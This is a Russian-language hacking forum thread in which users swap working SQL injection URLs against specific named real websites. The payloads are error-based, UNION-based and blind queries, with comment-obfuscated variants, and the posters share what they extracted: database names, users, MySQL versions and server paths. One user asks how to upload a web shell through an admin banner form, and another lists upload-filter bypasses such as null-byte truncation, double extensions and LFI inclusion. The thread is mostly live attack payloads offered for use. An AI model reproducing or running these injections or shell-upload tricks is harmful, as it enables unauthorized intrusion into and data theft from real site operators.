Code: http://www.spbpost.ru/index.php?page_id=(select+1+from+(select+count(0),concat((select+version()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+ PS: хотя бы тему читали иногда
http://www.spbpost.ru/index.php?page_id=-69.9%0AUNION%0AALL%0ASELECT%0A1,2,3,4,5,6,7,8,9,concat(0x7e,0x27,Hex(cast(database()%0Aas%0Achar)),0x27,0x7e),11,12,13,14,15,16,17-- смотри в исходнике <meta name="keywords" content="~'737062706F73745F6462'~"> тоесть spbpost_db
YuNi|[c, а зачем его в hex переводить, да еще и cast юзать, и переносы строки (%0a) вместо обычных пробелов? CyberHunter, юзай: Code: http://www.spbpost.ru/index.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(concat_ws(0x3a,user(),database(),version()))),11,12,13,14,15,16,17 Code: spbpost@localhost:spbpost_db:5.1.42-log
пора бы уже начать понимать, что union и вообще подбор кол-ва колонок и выявление принтабельных уже просто неакутальны практически, прошлый век)
ну не стреляй в пианиста, он играет как можеть )) Если накодиш для автоматизации сорец вот тогда пригодится мой вариант
Code: http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*' http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*' http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'
народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет
способов масса, большинство описаны на форуме. обрезать нульбайтом, двойное расширение, загрузка файла как есть, с последующим инклюдом его (если LFI на сайте или серве) ну и некоторые другие способы
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей. Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так: Code: http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1+--+ Что не так? И как сделать чтобы выводилось?
а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая: Code: http://www.nwec.ru/index.php?issue_id=57+and+substring(version(),1,1)=5 @@basedir: /usr/ @@tmpdir: /tmp/ @@datadir: /data/ version(): 5.0.77-log database(): db_cevzap_1 @@version_compile_os: unknown-linux-gnu хотя может и не так)